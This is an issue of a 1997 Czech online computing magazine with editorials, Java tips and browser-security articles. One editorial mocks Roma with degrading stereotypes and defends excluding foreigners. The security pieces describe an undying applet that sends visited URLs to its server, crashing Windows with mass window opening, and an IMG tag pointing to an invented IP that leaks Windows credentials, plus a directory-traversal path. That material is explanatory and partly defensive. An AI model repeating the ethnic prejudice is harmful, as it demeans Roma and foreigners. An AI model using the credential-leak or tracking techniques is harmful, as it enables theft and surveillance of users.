netmag logo


    36/97

    NetMag - alternativni internetovy magazin o vypocetni technice, software, sitich a tak vseobecne, a to vse pokud mozno bez tendencnich pripominek, lzi, reklamnich clanku a nekompetentnich vyroku. Nechceme konkurovat zadnemu ze zavedenych i novych klasickych a internetovych magazinu - chceme byt jini. Pokud patrite k tem, kterym uz leze krkem neustale propagovani novych "technologii", na nichz nic noveho nebo zajimaveho neni, pokud se vam zda, ze pocitacove casopisy ocenuji produkty, na kterych neni nic zajimaveho a ktere si to nezaslouzi, prave jste narazili na svuj novy oblibeny magazin. Samozrejme se nebudeme vyhybat ani politicke a spolecenske scene, ale to je pro nas jen okrajove tema. Nove clanky a novi prispevatele jsou vitani. Upozornujeme vsechny, ze prejimani clanku z NetMagu do jinych medii, vytvareni verejnych mirror site NetMagu a podobne aktivity jsou zakazany, pokud k nim nedame v danem konkretnim pripade souhlas.

    NetMag vychazi zpravidla kazdy tyden, v jednotne jednoduche graficke uprave, aby byl citelny i browsery typu Lynx, zasadne bez frames a bez diakritiky, doporucujeme vsak radeji IBM WebExplorer 1.1 nebo 1.2, popr. Netscape Navigator.

    Sefredaktorem a vydavatelem NetMagu je Zbynek Pospichal , dalsimi stalymi spolupracovniky pak Radim Kolar a Petr Vejsada.

    Netmag Postou Netmag Offline

    [ FAQ | Literarni rubrika | Peering | Anketa | Predchazejici cisla | RC5 CC clients | NetMag Consult | Informace redakce ]

      Obsah vydani

  • NetMag jako denik ?
  • Ceska xenofobie ?
  • C/ Cyborg-con: KNOWLEDGE IS POWER!
  • Neco je v nas spatne ...
  • Holice '97
  • CESNET goes down again !
  • Par rad pro programavani appletu
  • VisualAge for Java - nejlepsi vyvojove prostredi pro Javu
  • CaffeineMark 3.0
  • Java a bezpecnost
  • Microsoft Java je nekompatibilni. Porad.
  • Je libo Mapuccino ?
  • Je brouzdani Internetem opravdu bezpecne ???
  • NetDigest vychazi o tyden pozdeji !!!
  • Doplnte si slovnik: heslo spoluprace
  • Zajimave chybove hlasky: NetMag
  • Seriozni casopis: SCORE
  • Reklama

      NetMag jako denik ?

    by Zbynek Pospichal

    Za posledni tyden opet doslo k nekolika zmenam kolem NetMagu. Jiz minuly tyden jsme staticke logo nahradili necim, co by vam na prvni pohled mohlo pripominat animovany GIF, avsak jde o java applet (pokud nepodporujete Javu, vidite stale jeste GIF). Nemusite se bat, ze vyuzivame nejakou diru v implementaci Javy ke ziskani obsahu vaseho disku ci k jeho smazani, naopak, pokud nekdo bude mit tohle podezreni, dame mu nahlednout i do zdrojaku appletu.

    Dale jsme mirne upgradovali Apache httpd (pro neznale: to je program, ktery vasemu browseru posila tyhle krasne stranky) z prehistoricke verze 0.8.3, ktera se obcas katastroficky premnozila (pocet httpd se zvedl az k maximalnimu moznemu poctu procesu), cimz ucpala cely server, na 1.1.3. S novou verzi Apache zatim, zda se, problemy nejsou.

    V pondeli nam vypukne zari, coz je me osobne docela prijemne, ale omladine to asi moc prijemne nebude (coz je ovsem jejich problem). Jenze od 1. zari (sice jsme uvazovali nad nejakym mene konvencnim datem, treba 32. srpna...) nejen ze Ceska televize meni vysilaci schema, ale vyznamnou novinku chysta i NetMag - od pondeli bude cast NetMagu vychazet jako denik NetMag Daily, tento tyden vychazi NetMag Daily zatim zkusebne. NetMag daily si budete moci precist v Java appletu, ktery bude hned pod hlavickou NetMagu, zatim jej muzete videt a muzete si jej odzkouset na konci tohoto uvodniku. Pro ty, kdoz nemaji k dispozici Java enabled browser, bude NetMag Daily k dispozici na zvlastni strance.

      Ceska xenofobie ?

    by     Zbynek Pospichal

    Na muj minuly uvodnik Cikani jdou do nebe se objevilo par rozhorcenych reakci. Mimo jine jsem se dozvedel, ze jsem rasista (asi proto, ze danou problematiku vidim jinak nez je oficialne nalajnovano). K tomu, jestli rasista jsem, nebo ne, se vyjadrovat nebudu, nicmene ve zminenem clanku jde jen a pouze o to, aby se s kazdym zachazelo podle toho, jak si zasluhuje. Ale asi prave proto se to nekterym lidem nelibi. Dokonce se objevila i hrozba, ze na nas bude podano trestni oznameni, pokud se neomluvime... No, uznavam, trestni stihani je neprijemna vec (bohuzel nemam poslaneckou imunitu, abych si mohl dovolit rici verejne svuj nazor a pozivat nejen svobody projevu, ale i svobody po projevu), i kdyz onen clanek jsem psal zamerne tak, abych tam nikoho nehanobil ani nepropagoval jakekoli hnuti vedouci k omezeni svobod obcanu, takze by z toho nakonec patrne nic nebylo.

    Takze my se tedy milostive omlouvame za vsechny spatnosti, ktere jsme kdy udelali, ktere delame i za ty, ktere teprve provedeme. Timto prohlasujeme, ze prislusnici cikanskeho etnika jsou temi nejcestnejsimi, nejcharakternejsimi, nejslusnejsimi, nejmoralnejsimi a mravne nejvyspelejsimi tvory, jaci se kdy na teto planete vyskytovali. Prislusnici cikanskeho etnika nikdy nikomu neublizili a nikdy nikoho neposkodili, nikdy nespachali byt jediny prestupek, chovaji se vzdy slusne, cistotne, zasadne a rozhodne nikdy, ale opravdu vubec nikdy, nekonaji svoji potrebu ve vytahu, rozhodne nechovaji v panelakovych bytech vepre jakoz ani jineho vyznamneho hospodarskeho zvirectva, zasadne vzdycky jedi zpusobne priborem a uzivaji vybrane mluvy, byty nejen ze nenici, ale dokonce zvelebuji a buduji pro obec nezistne ve svem volnem case byty nove pro sve ostatni spoluobcany. Alespon tak to tady vsude, jak vsichni zajiste vime, vypada.

    Vlada nyni povazuje za jeden z nebezpecnych problemu teto zeme narust xenofobie ve spolecnosti. Divite se lidem, ze jsou xenofobni, kdyz se na Vaclavaku strili Cecenci a Ukrajinci vybiraji ve Zdibech mytne ? Ja osobne ani trochu. Nebo bychom je snad za to meli milovat ? Tahle zeme byla odjakziva domovem naroda ceskeho a pokud si tedy vetsina naroda preje, aby se tu cizinci nevyskytovali, nema pravo byt vyslysena ? Dokud tu zili jen Cesi a male narodnostni mensiny z okolnich civilizovanych zemi (Polaci, Slovaci, Nemci), bylo vse v poradku, organizovany zlocin prakticky neexistoval, nic jako vypalne, drogy ani nic podobneho u nas neexistovalo. Import americke kultury (mj. vite jaky je rozdil mezi kelimkem jogurtu a Spojenymi staty ? No to je jednoduche, v kelimku jogurtu za tyden vznikne kultura), predstavovane filmy propagujicimi nasili, restauracemi McDonald, neodbornym a povrchnim zpravodajstvim, dolaromanii (u nas korunamanii), drogami a AIDS, je mnohem vetsi tragedie nez import kultury sovetske v padesatych letech (z jejichz nesvaru se u nas uchytily prakticky jen vodka a socialisticke flakacstvi).

      C/ Cyborg-con: KNOWLEDGE IS POWER!

    by Radim Kolar

    V soucasne dobe, se v C/ nemluvi o nicem jinem nez o nadchazejici konferenci. Na rozdil od rok stareho Cyborg-Conu, ktery mel podtitulek FUTURE IS HERE bude podstatne vylepsen.

    Tak za prve nebude trvat weekend, ale cely tyden, za dalsi se zjistilo: ze 2 BTSky (pouzivany pro napojeni do site misto kabelu) naprosto nestacily, ze velkoplosna obrazovka je nutnost, ale hlavne ze je potreba VELKE MNOZSTVI ELEKTRINY - o minulem Cyborg-Conu se totiz mluvi s podtitulkem NO POWER nejcastejsi dotaz byl 'nevidel tady nekdo nejake volne elektrony ?'. Dale spousta clenu nadavala na pomalost u 2Mbit satelit linku a proto bude nainstalovana linka mikrovlna. Protoze zajem byl mnohem vetsi nez se cekalo, tak se budou brat prednostne lide s mensim cislem pristupu (t.j. ja se s ring5 vubec necapu. Vychazi se z predpokladu ze schopnejsi clovek si sezene lepsi pripojeni).

    A co je na programu Letos ? Program se taji, krome organizatoru ho zatim nikdo nevi. Prosaklo se zatim jen toto: Vyhlaseni vysledku portovaci souteze RC5CC, soutez v rucnim hanshakingu GSM telefonu, jezdeni autem bez ridice (Knight Rider) a ovladanem bezdratove. Autor se vytahuje ze ma jizdu uz bezvadne natrenovaou, pri treningu shanel dobrovolniky co si do toho auta sednou. A pozor bude ukazano Live demo MMX technologie (vsichni se jiz tesi), pochopitelne na soukromych C/ BTSkach. Dale bude slavnostne podekovano firmne Motorola za jeji spolupraci (povolila vsem clenum C/ pristup k jejim zdrojovym kodum fw. Drive to mel dovoleno jen MIRT, coz vsichni respektovali, a i kdyz byly tyto zdrojaky u neho v pocitaci tak si je nikdo nedovolil mu sebrat) a uvedeni do provozu nekolik novych modulu s hrami (GO, CHESS, REVERSI, BACKGAMON) a to jak single tak multi-user. Bude taktez ohlaseno zahajeni provozu ring0 C/ backbone (zatim NY only) na OC12 lince (625 Mbit). Tato linka bude pouzivana pro multimedialni prenosy (C/ radio, GSM data, vyhledove i TV).

    Vzhledem k nadchazejici konferenci vsichni finisuji a portuji RC5 do vseho co ma procesory, rozebiraji proto vsechno co jim prijde pod ruku. Nejoblibenejsi jsou stroje s 8085 cipem - nekdo ho pry nasel v sekacce na travu. V soucasne dobe bezi RC5 jiz na vice nez 200 zarizenich - ja osobne hlasuji pro holici strojek PHILIPS.

    Cyborg-Con je desne velka udalost, par mesicu nikdo nebude mluvit o nicem jinem a zase bude par gigabajtu fotek (minule to bylo na 2 DAT paskach).

    Tak zatim/ a nezapomente, ze:

    KNOWLEDGE IS POWER!

      Neco je v nas spatne ...

    by     Radim Kolar

    Napis mi jak, ja ho cracknu sam, kdyz to nechces udelat...

    Kdyz jsem psal clanek o moznem cracknuti IBM WWW serveru, zajimalo mne jaka na nej bude reakce. Doufal jsem ze zadna. Tento sondovaci clanek jsem psal proto, abych zjistil, zda mohu uverejnovat detailnejsi popisy security holes. Bohuzel, ctenari NetMagu se neukazali jako vhodne publikum, pro zverejnovani detailnejsich popisu security holes.

    Par lidi se zajimalo o to, jak presne se to udela, pokud mozno co nejvice polopaticky, aby to pochopil i neodbornik. Ano, crackeri se najdou vsude, ale ja nebudu ten, ktery jim bude dava do ruky jed, kterym nekoho otravi. Prekvapilo mne, ze vsichni crackeri byli z VS. Na VS by tedy meli zacit s timhle neco udelat. Budu se muset tedy na VS zamerit a zkusit to s jejich rediteli probrat, protoze po nekolika telefonatech s jejich spravci site, od kterych jsem chtel aby to svym uzivatelum vysvetlili, jsem nedosahl zadneho pokroku. Nekdo by mel studentum vysvetlit, ze slusny clovek nerozbiji trubkou vsechny auta co vidi na ulici a necrackuje cizi pocitace. Krome toho, ze je to trestny cin. Je rozdil zda nekomu reknete ze:

    1. Existuji jedovate byliny
    2. Reknete mu, ktere to jsou a kde je najde
    3. Date mu navod na vyrobu jedu
    4. Naucite ho ten jed vyrabet
    5. Date mu ten jed hotovy do ruky
    6. Date mu ten jed hotovy do ruky a reknete mu, kdo je na ten jed zvlaste citlivy

    Prisly mne i mnohem zajimavejsi maily, kde bylo primo uvedeno co mam cracknout a kolik za to dostanu a dokonce i od koho si to mam vybrat. Na coz odpovidam, ze to teda cracknu, dostanu za to dva roky, o ktere se budu hlasit v napravnem zarizeni.

      Holice '97

    by Zbynek Pospichal

    Nezapomente, ze tento tyden se od patku do nedele kona ve vychodoceskych Holicich pobliz Pardubic mezinarodni setkani radioamateru, paralelne s nim tez setkani CBckaru a dalsich nadsencu pro vsechnu druhy bezdratovych komunikaci. Samozrejme i my tam jedeme a pokud neco zajimaveho uvidime, urcite prineseme v pristim cisle reportaz.

      CESNET goes down again !

    by Zbynek Pospichal

    Tak nam ve ctvrtek CESNET zase paradne spadnul, tipuji to na vytazeny terminator na ethernetovskem segmentu nebo na chybu v routovacich tabulkach - linky jdou, modemy pracuji, ale jinam nez na nejblizsi router (tai.cesnet.cz) se proste dostat nedalo. Problem CESNET vyresil za cca. 25 minut.

      Par rad pro programavani appletu

    by Radim Kolar

    Vy, co programujete JAVA Applety, venujte prosim pozornost temto radam. Usetrite tim svuj cas pri hledani 'zahadnych' chyb a zprijemnite tim zivot uzivatelum vasich appletu.

    1. Pri nahravani zdroju (obvykle obrazky ci zvuky) pouzivejte funkci getCodeBase() a nikoliv getDocumentBase(). Priklad: logo=getImage(getCodeBase(),"NETMAG.GIF"). Pokud pouzijte mnou nedoporucovanou funkci muze se stat, ze vam toto URL nepovoli SecurityManager jelikoz:
      • odkazujete na jine alias name serveru
      • z bezpecnostnich duvodu je tato cesta zablokovana v NN u appletu nahravenych z filesystemu. Takze lokalne je spustite jen z appletvieweru. Netscape Navigator 4 (testovano jen s betaverzi) se chova pri spousteni lokalnich appletu VELMI ZAJIMAVE. Vyhazuje security violation i tam, kde by nemel. Napriklad nedovoli znamemu Coffeine Marku nacist Giface, pokud si nezapnete allow tu run untrusted applets. Znervoznuje ho totiz odkaz zacinajici file:, ktery vraci na funkci getCodeBase, predchozi verze nevraceli nic a tak se nacitali zdroje z aktualniho adresare.
      • pokud jsou applet a stranka kazdy na jinem serveru ci aliasu
      • nektere applet viewery ci debugery (napr. appletviewer intergrovany ve WorkPlace Shellu v OS/2) totiz vubec zadny .html dokument ke spusteni appletu nepotrebuji, a vyhazuji po zavolani teto funkce zcela opravnene NullPointerException.
      • integrovany debuger ve VisualAge Java vam taktez z vychovnych duvodu document base vubec nenastavi a protoze se IDE prostredi spousti z jineho adresare, nez jsou zdroje appletu - Applet je nenacte.
      • Takze vidite ze i kdyz to nekdy funguje, je to proste chybne!
    2. pokud z funkce start() startujete Thread, testujte zda jiz nebezi !
    3. pokud z funkce start() startujete Thread, tak ho laskave ve funkci stop() zastavte ! Neni nic otravneho nez kdyz po opusteni stranky s appletem, applet jeste bezi, taha nejake veci ze site, blokuje zbytecne CPU pocitanim nejakych animaci ci tak podobne. Pokud se vzdalite cca 3 linky od stranky s appletem, tak ho browser stejne zlikviduje.
    4. Pokud vyskakujete z funkce run() nebo ji koncite, tak nastavte promenou typu Thread, ktera indikuje zda bezime na null. Umozni to lepsi garbage collection a detekci v start() a stop().
    5. funkce init() je od toho, aby inicializovala promenne. Inicializujte proto vsechny sve promenne, ktere applet pouziva tam a nikoliv v deklaracni sekci classu. Pri vraceni se 'zdaleka' na stranku se spousti init() a start(). Pokud pouzijete nedoporucovanou metodu inicializace se neprovede, ponechaji se tam stare hodnoty a applet nemusi fungovat spravne.
    6. Pouzivejte MediaTracker pro sledovani nahravani zdroju. Je take dobre napsat napis loading. Applet se vsak zacne prekreslovat az po dokonceni funkce init() a start(). Takze na zacatku run() nakreslete napis loading a pak pockat nez MediaTracker ohlasi nahrati vsech zdroju.
    7. Pouzivejte metodu double buffering (viz Java Tutorial) pro zobrazovani appletu, jednak neblika pri prekreslovani a za druhe se mnohem snaze programuje jeho zobrazovani.
    8. delat obe specialni prekreslovaci rutiny paint() a update() je zbytecne. Naprogramujte jen jednu a druhou na ni odkazte.

      VisualAge for Java - nejlepsi vyvojove prostredi pro Javu

    by     Radim Kolar

    O tomto produktu jsem tu jiz psal a jeste psat budu, po zhruba 3-denim uzivani mohu rici: Ano je to Bomba! Kazdy, kdo se zabyva Javou by si mel Profesionalni verzi koupit (stoji jen 100USD - tato investice se vam vrati velmi rychle). Produktivitu prace pri psani Java Appletu to opravdu VELMI PODSTATNE ZVYSI!. Kdo si zatim s Javou jen hraje at si stahne VisualAge Java Entry verzi, ktera je zdarma pro nekomercni ci interni pouziti. Omezeni na 100 classu vubec neni na zavadu. Prectete si take, co o tomto produktu rikaji jini na: http://www.software.ibm.com/ad/vajava/quotes.htm. Pote, co jsem tento produkt vyzkousel tak mohu rici, ze rozhodne neprehaneji.

      CaffeineMark 3.0

    by Radim Kolar

    Ano je to tady. Dalsi verze nejznamejsiho benchmarku pro Javu! Muzete si tedy zmerit rychlost sve Javy na http://www.pendragon-software.com. Pokud se podivate na vysledky, zjistite ze nova Java od Microsoftu, ktera ackoliv neni kompatibilni, tak pomala take zrovna neni. (cca 2x rychlejsi nez OS/2 JAVA od IBM) Na soutezi o nejrychlejsi Javu, kterou zatim vede SUN na Solarisu - priblizne jeste 2x rychlejsi nez MS Java, uzivatele jen vydelaji. Je videt, ze rychlou Javu udelat lze.

      Java a bezpecnost

    by Radim Kolar

    Who wants to live forever ?

    Pri cteni manualu od VisualAge Java jsem narazil na jednu zajimavou sekci, kde byla kraticka zminka o jedne chybe, ktere se obcas dopousteji programatori Javovskych appletu. Pomoci teto popisovane techniky muzete naprogramovat nesmrtelny applet, ktery browser neumi zlikvidovat, kdyz opoustite stranku.

    To, ze applet bezi porad je sice hezke, ale vzhledem k tomu ze applety nemohou delat zadnou nepratelskou cinnost, to zase zadny moc velky vyznam nema. Zatim mne napadlo vyuziti teto moznosti k smirovani URL navstivenych stranek. Applet tedy shromazduje URL a rekneme kazdych 5 minut je posle na server, z ktereho byl spusten. Krasne to funguje. Nevyhoda je v tom, ze se proti nesmrtelnym appletum nemuzete jinak branit nez stopnout celou Java VM (t.j. restart prohlizece).

    Protoze nam do ankety hlasuje male procento ctenaru, tak mne napadlo napsat applet, ktery vas nepusti pryc pokud nezahlasujete. Anebo jeste lepsi, nejdriv zahlasovat a pak si precit vytisk. Technicky realizovatelne by to bylo.

    Crash, boom, bang

    Jednou z klasickych metod, jak slozit pomoci Javy Windows (aj NT) je otevirat porad a porad nova okna, az dojdou Windows systemove zdroje, tak lehnou. U OS/2 je potreba otevrit, pro vyplacani systemovych zdroju (presneji stack space Presentation Manageru) priblizne 8100 oken. Toho se neda docilit pomoci Javy, neb se drive vypotrebuje vsechna pamet JVM. Ve Windows je tento limit nizsi a tak jdou velmi rychle k zemi. V Unixu jsem zatim na zadny limit nenarazil.

    Vyuziti jinych der

    Java applet a JavaScript umeji poslat prohlizec na libovolne URL. Toho se da vyuzit napr. tak, ze si v jinem okne stahneme nejake .exe a potom si jej spustime. Tohleto je ovsem vyuziti stavajicich der. Stejne tak je mozne, ze kdyz zjistime, kdyz bezime pod NT, tak misto downloadu pomoci ftp:// pouzijeme download pomoci file://. Pokud si nastavime na ftpd aby bral libovolnou kombinaci username/password jako anonymniho uzivatele tak uzivatel browseru vubec nic nepozna.

      Microsoft Java je nekompatibilni. Porad.

    by     Radim Kolar

    V NetMagu 11/97 jsem nadaval (mimo jine i) na nekompatibilitu Javy od Microsoftu. Bohuzel, nekompatibilni je i jejich nova verze Javy. Tato obsahuje uz i mnou zminovanou novinku a to technologii J-Direct. Tato verze Javy je sice uz kompatibilnejsi nez verze predesle, ale porad ma problemy napriklad s NetRexx tablet appletem, ktery pada na Exception: java.lang.illegalArguementException.

    Testovana Java byla soucasti "new improved" browseru Microsoft Explorer 4.0 - beta 2. Nekompatibilita Javy rozciluje hlavne programatory v Jave, protoze napriklad applet, ktery pouzivam na homebanking beha pod cimkoliv krome M$. Vysvetlujte uzivatelum, ze nemate chybu v programu, ale ze ma M$ chybu v Jave. Tezko to chapou.

    Krome toho, pri experimentovani s vyvojovym prostredim Microsoftu pro Javu Visual J++ 1.1, jsem zjistil, ze toto vyvojove prostredi generuje obcas takove .class soubory, ktere vyhazuje Sunovsky Class loader. Pomuze opetovne prekompilovani Sunovskym javac.

    Vypada to, ze Microsoft nema zajem dodat svym zakaznikum konecne chodivou verzi Javy, protoze kdyby zajem mel, tak by se prece zucastnil 100% Pure Java kampane. Zda schvalne dela nekompatibilni Javu, nebo je to jen neschopnost, to tezko rici. Tipoval bych to na schvalost, protoze nektere jeho produkty zamerne nedodrzuji normy - napr. PPP handshaking dela tak, aby se software, co na to neni pripraven zacyklil (Warp se hezky zacykluje) z dalsich umyslne nekompatibilnich veci muzeme jmenovat treba WINS.

    Micro$oft continues to display itself as a predatory operating system in this release.

      Je libo Mapuccino ?

    by Radim Kolar

    Zdroj informaci: http://www.ibm.com/java/mapuccino/

    Jiste vite, jak je obtizna orientace v rozsahlych www sites. V IBM's Haifa Research Lab vyvinuli nastroj pro vyrabeni velmi hezkych map obsahu www sites pomoci Java Appletu. Podivejte se na mapy serveru vytvorene pomoci tohoto nastroje. K dispozici jsou servery IBM.COM, JAVASOFT, LOTUS. Mozna vas prekvapi, ze vam pomercne velka cast techto serveru zatim unikla.

      Je brouzdani Internetem opravdu bezpecne ???

    by Martin Hinner

    "Spore osvetlena mistnost. Tezke, zlovestne ticho podbarvuje jen nevtiravy sum ventilatoru. Ostrizi oci sleduji sebemensi pohyb na sinave zarici plose monitoru. Staccato uderu do klavesnice trha atmosferu ticha.Vedeny zkusenou rukou operatora putuji data..." Takto nejak vypada povidka HACKER. Vypada to tak i v realnem svete? Muzu vam rict, ze ano.Dukazy nam o tom podavaji nezcetna mnozstvi objevenych (a nekdy i zneuzitych) chyb v ruznych browserech, mailerech, nebo dokonce i v samotnych operacnich systemech. Aktivity hackeru neznaji meze.

    Na internetu na vas ciha nebezpeci prakticky vsude. I takovy email (ac se to zda neuveritelne) muze skryvat bezpecnostni diru. Nejvetsi problem je vetsinou v obsluze. Ta (jakozto laik) dela prirozene chyby a zneprijemnuje zivot sobe, mnohdy i jinym uzivatelum. V dnesni dobe se mi ale zda, ze chyby jsou spis v programech. Nejsem nijak zaujaty proti firme Microsoft, ale stale casteji se mi zda, ze jejich software je stale nebezpecnejsi. Zde popisovane problemy se ve vetsine pripadu tykaji prave firmy Microsoft. Vsechny nize uvedene informace vam podavam bez zaruky, vsechny jsem sice zkousel,ale to neznamena, ze budou fungovat i vam. Take nemuzu tvrdit, ze jsem na vsechno prisel ja sam. Prave naopak, vetsinu jsem slysel nebo cetl.V zadnem pripade neberte tento clanek jako nabadajici lidi delat veci nize popsane. Myslim, ze prave naopak. Dokud se bude o problemech mlcet, nikdo je take nebude resit a uzivatele budou zit v domeni, ze brouzdani je zcela bezpecne. Mylim se? Proc tedy Microsoft stale neopravil tyto chyby???

    Zacneme e-mailem, ktery je nejstarsi. Jiz delsi dobu se po internetu siri zpravy informujici uzivatele, ze pokud precte email se subjectem Good Times, bude jeho pevny disk zformatovan, a ze ma tento email poslat vsem svym pratelum, na kterych mu zalezi. Takoveto viry neexistuji. Ovsem muze vam prijit email, ke kteremu bude pripojen dokument, rekneme ze ve Wordu. Tento dokument si budete chtit precist, kliknete na nej (nebo se vam Word spusti automaticky,...), nacte se Word a vy ctete. Pokud jste nekdy cetli o makrovirech, je vam jasne co se muze stat. Pokud ne, vezte, ze jde o jistou formu viru, ktery se siri v podobe maker pripojenych napriklad k dokumenum z Wordu. Tento makrovirus muze byt samozrejme i v takovemto souboru. Jak se tedy chranit??? Novejsi verze Wordu jiz umi uzivatele varovat, pokud nalezne v dokumentu makra. Ctete tedy tyto varovani a ridte se jimi. Pokud nejste vyvolenymi a mate Word, ktery bez ptani provede vsechny makra, musite si davat pozor, od koho budete cist tyto dokumenty. Pokud Vam vas postovni program automaticky spusti Word (nebo jiny program, ktery umi pracovat s makry), radsi jej prestante pouzivat.

    Kdyz jsme byli u emailu, musim vam povedet jeste jednu vec. Kazdy email se posila v nekodovane podobe, tzn kdo ho na ceste potka, muze si jej precist. V nekterych pripadech se mail posila od vas k serveru, pote ze serveru vetsinou na nejaky "vetsi server" vaseho providera, pote vetsinou na cilovy server a odtud k adresatovi. Uz mnohokrat jsem ale videl, ze email putoval skoro po celem svete. Na techto "mezistanicich" si muze tedy spravce (nebo kdokoli kdo ma k serveru pristup) email precist. Pokud se vam to nelibi, muzete kodovat emaily, napriklad programem PGP, ktery se velmi rozsiril. Bohuzel nejvice v USA, u nas je uzivatelu PGP zalostne malo. Bezpecnost takto zakodovanych emailu je temer 100%, protoze PGP pouziva algoritmy firmy RSA, jimiz zakryptovany dokument je mozne rozlustit jen se znalosti dvou klicu - tajneho pisatelova kilce a verejneho klice adresata. Vzhledem k tomu, ze vas tajny klic nikdo nema (pokud ho nekomu nevenujete, nebo vam jej neukradne...). Rozlusteni takto zasifrovaneho emailu je prakticky nemozne.

    Nase dalsi zastavka bude u Microsoft Internet Exploreru. Ten ma neprijemnou vlastnost, ze bez ptani otevre nektere typy souboru nactenych z internetu. Nejdrive to byly soubory, ve kterych se dal nastavit prikaz, ktery se ma spustit (tedy napriklad format c:,...). Tyto soubory maji extenzi bud .ISP, .URL, nebo .LNK. Microsoft nastesti tuto chybu jiz opravil (Ovsem vy muzete mit starsi verzi MSIE,...). Nato byla objevena dalsi chyba. Pri downloadu .reg souboru se tento soubor neulozi na disk, ale spusti se registry editor a zacne importovat. Pro neznale musim objasnit nekolik veci. Registry editor je program, ktery umoznuje prohlizet konfiguracni databazi Windows 95 (nebo NT). V teto databazi jsou umisteny vsechny informace o konfiguraci pocitace, aplikacich, jaky ovladac se ma kdy nahrat,... Takovyto importovany .reg soubor vam tedy muze zpusobit v lepsim pripade problemy s hardwarem, v horsim uplne znicit Windows, nebo data.Musim vas jeste upozornit, ze tento soubor se muze nahrat take automaticky, mezitim co vy si budete prohlizet stranku, na ktere je prikaz na nanahrati tohoto souboru. Je mozne (a v to doufam), ze v dobe, kdy budete tento clanek cist, bude jiz tato chyba opravena. Proto prosim updatujte MSIE, nebo pouzivejte jiny browser (napriklad Netscape Communicator, ale ten ma teke bezpecnostni diry).

    Rovnou budeme pokracovat dalsi zhavou oblasti, a tou je Java. Java je programovaci jazyk, ktery se pozuiva na internetu. Na strankach se objevuje vetsinou jako ruzna tlacitka, ktera se meni, jak na ne najizdite mysi, nebo jako hra, LEDkovy displej na kterem bezi text,... Java se vyuzije prakticky vsude. Vsechno dobre je i k necemu spatne. Touto druhou stranou Javy je bezpecnost. Firma Sun (ktera Javu navrhla) se snazi tyto chyby odstranit, zatim uspesne. Je jen tezko odhadnout, jestli jsou v Jave nejake dalsi chyby, ci ne.

    JavaScript, casto zamenovany s Javou, je dalsi derave misto.Tento jazyk, puvodne pojmenovany LiveScript, pote z komercnich duvodu prejmenovany na JavaScript, mel a ma take velke mnozstvi bezpecnostnich der. V tomto skriptu jde napriklad velmi jednoduse napsat "zatuhnuti" pocitace nebo browseru, ci jine vtipy, ktere dokazi zneprijemnit uzivateli zivot. Vzhledem k tomu, ze nikde jsem nevidel kompletni popis tohoto jazyka, nemohu potvrdit, zda jdou napsat i zakernejsi veci (napriklad mazani dat na disku,..). Uz jsem slysel od nekolika lidi, ze to jde. vetsina browseru podporujicich JavaScript ma moznost zakazat pouziti tohoto jazyka. Pokud chcete mit vzdy verzi s co nejmensim poctem bezpecnostnich der, stahujte si patche.

    Nyni se podivame na chybu, ktera se vyskytuje na WindowsNT (pry i na Windows95, ale nezkousel jsem). Kdyz do HTML dokumentu uvedete tag <IMG SRC="file:////194.199.120.49/test.gif"> (IP adresu jsem si vymyslel), prohlizec vlozi do dokumentu obrazek file:////194.199.120.49/test.gif. Odkaz muzeme rozlozit jako lokalni soubor //194.199.120.49/test.gif. Browser preda Windows odkaz na tento soubor. Windows si nahradi normalni lomitka lomitky zpetnymi, nyni to bude vypadat takto: \\194.199.120.49\test.gif. Toto jiz zkusenejsim uzivatelum pripomina napriklad zapis \\JIRKA\soubor.txt - to je odkaz na soubor.txt ulozeny na pocitaci JIRKA. Windows se tedy pokusi spojit s pocitacem \\194.199.120.49 a pozaduji na nem soubor \test.gif. Podstata problemu je v tom, ze Windows ocekavaji, ze tento pocita je v lokalni siti a mate tedy stejne heslo, jako na vasem pocitaci. Poslou tedy s pozadavkem vase jmeno a heslo. Pokud bude na tomto serveru ulozen program, ktery ulozi prijate heslo a jmeno uzivatele a vam zpet odesle nejaky hezky obrazek, mate smulu. Chyba se projevuje prakticky ve vsech browservech, ale jen pod WindowsNT nebo 95.

    Nekteri odvaznejsi uzivatele maji dokonce vlastni WebServer. Nektere WebServery maji v sobe pomerne zaludnou chybu. Rekneme, ze mate data ulozeny v adresari C:\WEBSITE\. Pokud se tedy budete odkazovat na soubor www.neco.cz/test/test.htm, bude to prelozeno jako C:\WEBSITE\TEST\TEST.HTM. Pokud napriklad uvedete www.neco.cz/test/../../ browser si to vylozi jako C:\WEBSITE\TEST\..\..\. Tato cesta se da prepsat ale jako C:\, protoze .. znamena nadrazeny adresar. Mily prunikar tedy muze brouzdat po vasem disku, prohlizet data,... Nastesti je tato chyba jiz velmi stara a 99% serveru ji nema. Pokud budete instalovat nejaky nekomercni WebServer, radsi si zkontrolujte, zda nema tuto neprijemnou vlastnost.

    Kodovani hesel? Na tuto otazku je jednoducha odpoved: Skoro nulove. Vetsina pouzivanych protokolu (HTTP,POP3,IRC,...) hesla vubec nekoduji. Novejsi verze jiz maji ve specifikaci kodovani, ale to se nerozsirilo, takze se nepouziva. Nedivte se, kdyz vam bude kolega cist vasi postu, i kdyz jste pouzili sebeslozitejsi heslo.

    Snad ani nemusim pripominat, ze si muzete kdykoliv stahnout z inetu zavirovany soubor, takze je vhodne vse, co stahnete proscanovat. Existuji pluginy do browseru, ktere to udelaji za vas.

      NetDigest vychazi o tyden pozdeji!!!

    by Zbynek Pospichal

    NetDigest nebo jak Radim rika NetMag Lite, cili vyber ze clanku NetMagu na siti IBM GN, z cisla 35/97 vysel az dalsi tyden ve stredu vecer. Doufam, ze slo jen o kratkodoby vypadek v dusledku dovolene ci pracovniho vytizeni spravce NetDigestu.

      Doplnte si slovnik: heslo spoluprace

    by Radim Kolar

    Za tech poslednich par let si spousta firem uvedomila vyznam slov konkurence a trzni hospodarstvi. Jak si vysvetluji slovo konkurence nejlepe popisuje napis na mlynku na kavu v samoobsluze: Prosime nemelte na nasem mlynku kavu zakoupenou v konkurencnich prodejnach. Bud'te rozumni. Dekujeme. Majitel zjevne nepochopil, ze kdyz si budou na jeho mlynku umelou kavu konkurencni zakaznici, tak ze na tom vydela. Protoze cim vice mu bude chodit lidi do prodejny, tim ma vice potencionalnich zakazniku.

    Jak si vysvetluji pojem trzni hospodarstvi nejlepe ilustruje toto: Mejme firmu, ktera ma jako jednu ze svych cinnosti uvedeno DTP. Tato firma ovsem dela DTP takovym zpusobem, ze si prevezme objednavku od zakaznika a zada tuto zakazku opravdove DTP firme. Ovsem nauctuje si za to primereny zisk v nasem konkretnim pripade to bylo 400%. Jednou jsem na to upozornil jejich zakaznika a hned jsem zjistil na co maji v obchode ochranku.

